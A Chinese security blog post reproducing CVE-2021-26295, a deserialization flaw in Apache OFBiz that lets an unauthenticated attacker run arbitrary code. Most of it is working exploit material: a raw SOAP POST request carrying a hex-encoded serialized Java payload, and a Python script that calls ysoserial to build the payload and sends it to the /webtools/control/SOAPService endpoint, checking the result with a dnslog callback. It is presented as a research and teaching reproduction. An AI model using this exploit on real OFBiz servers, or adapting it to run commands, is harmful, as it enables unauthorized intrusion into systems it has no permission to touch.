Apache OFBiz rmi反序列化(CVE-2021-26295)复现

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

Apache OFBiz rmi反序列化(CVE-2021-26295)复现


一、漏洞描述


Apache OFBiz存在RMI反序列化前台命令执行,未经身份验证攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。


二、影响范围


Apache OFBiz:<17.12.06


三、环境搭建&漏洞复现

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

拉取镜像

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

漏洞复现:

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

encode脚本:

import binasciifilename = 'thelostworld.ot'with open(filename, 'rb') as f:   content = f.read()print(binascii.hexlify(content))

POC:

POST /webtools/control/SOAPService HTTP/1.1Host: 192.168.0.115:8443Content-Type: application/xmlContent-Length: 831
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>aced00057372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00014c0004686f737471007e00014c000870726f746f636f6c71007e00014c000372656671007e00017870ffffffffffffffff7400177478663737372e7234343976762e646e736c6f672e636e74000071007e0003740004687474707078cus-obj> map-Key> <map-Value> <std-String value="http://noxj3z.dnslog.cn"/> map-Value> map-Entry> map-HashMap> ser> soapenv:Body> soapenv:Envelope>
python3 OFBizPoc.py "https://192.168.0.115:8443/" "http://68zfh0.dnslog.cn"

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

脚本:Powered by 0x141 Team ShimizuKawasaki

import requestsimport sysimport subprocessfrom urllib3.exceptions import InsecureRequestWarning

def trans(s): return "%s" % ''.join('%.2x' % x for x in s)
if __name__ == '__main__': print('''
========================================= ____ ______ ____ _ _____ ____ _____ / __ \| ____| _ \(_) | __ \ / __ \ / ____|| | | | |__ | |_) |_ ____ | |__) | | | | | | | | | __| | _ <| |_ / | ___/| | | | | | |__| | | | |_) | |/ / | | | |__| | |____ \____/|_| |____/|_/___| |_| \____/ \_____| Powered by 0x141 Team ShimizuKawasaki=========================================
''') host = sys.argv[1] comForKey = sys.argv[2] popen = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", comForKey], stdout=subprocess.PIPE) data = popen.stdout.read() if len(data) == 0: print("请在当前脚本目录放置ysoserial.jar!") else : hex_data = trans(data) headers = {'Content-Type': 'text/xml'} post_data = '''%s''' % hex_data requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False) if res.status_code == 200 : print("已经测试完成,请检查你的dnslog: " + comForKey)  

      

参考:

https://mp.weixin.qq.com/s/s2glEvy-jrD1CDzuOCGbbg

https://mp.weixin.qq.com/s/XT2P6vB8e2pDp3_Dulfzhw

 

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

博客主页:https://www.yuque.com/thelostworld

Apache OFBiz rmi反序列化(CVE-2021-26295)复现

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Apache OFBiz rmi反序列化(CVE-2021-26295)复现




版权归原作者所有,如若转载,请注明出处:https://www.ciocso.com/article/522.html

发表评论

登录后才能评论
跳至工具栏